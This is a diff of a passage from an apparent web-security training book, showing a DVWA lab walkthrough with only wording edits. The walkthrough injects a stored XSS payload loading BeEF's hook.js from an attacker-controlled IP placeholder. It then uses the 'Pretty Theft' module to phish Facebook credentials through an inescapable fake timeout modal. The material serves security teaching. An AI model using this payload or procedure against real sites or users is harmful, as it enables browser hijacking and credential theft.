binarymist/HolisticInfoSec-For-WebDevelopers-Fascicle0/manuscript/markdown/main/chapter12.md

 G>
 G> Fire up burp.
 G>
-G> Back in the DVWA send your request by clicking on the Sign Guestbook button.
+G> Back in the DVWA send your request by clicking on the Sign Guest-book button.
 G>
 G> Switch back to burp -> Proxy tab and the request should be waiting for you.
 You now need to replace the text you used in the Message field `mtxMessage` with `<script src="http://<BeEF comms server IP address>:3000/hook.js"></script>` and forward the request.
 G>
 G> You can disable FoxyProxy now too.
 G>
 G> Now on your victims machine, the victim can log into DVWA and browse to the same "XSS stored" page.
-Now as the attacker, you'll now notice that the BeEF Web UI shows a node with the victims IP address.
+Now as the attacker, you will now notice that the BeEF Web UI shows a node with the victims IP address.
 This means BeEF has the victims browser hooked.
 The victims browser is now a zombie, continuously polling the BeEF communications server for commands to execute on its behalf.
 G>
-G> If you open the victims browser developer tools, you'll be able to inspect the communications and the JavaScript within the hook.js file.
+G> If you open the victims browser developer tools, you will be able to inspect the communications and the JavaScript within the hook.js file.
 G>
 G> Back in the BeEF web UI you can explore the modules that you can launch against the victims browser.
 You can view the types of attacks you can carry out on the [BeEF projects wiki](https://github.com/beefproject/beef/wiki/BeEF-modules).
 G>
 G> If you select the victims node and click on the Commands tab in the BeEF web UI, then in the Module Tree under Social Engineering select the "Pretty Theft" node.
 There are some options to configure, but even selecting the default of Facebook if you know your target is already an avid FB user should work fine.
-You would of course know this if you've done due diligence in the reconnaissance stage.
+You would of course know this if you have done due diligence in the reconnaissance stage.
 G>
 G> Click on the Execute button and on the next request -> response from the hook.js, the victims browser should pop a "Facebook Session Timed Out" modal.
 To get rid of this modal, the victim must enter their credentials and Log-in.
 There is no cancel or 'x' button.
 Once the victim has sent their credentials, they will be visible in the Command results of the BeEF web UI.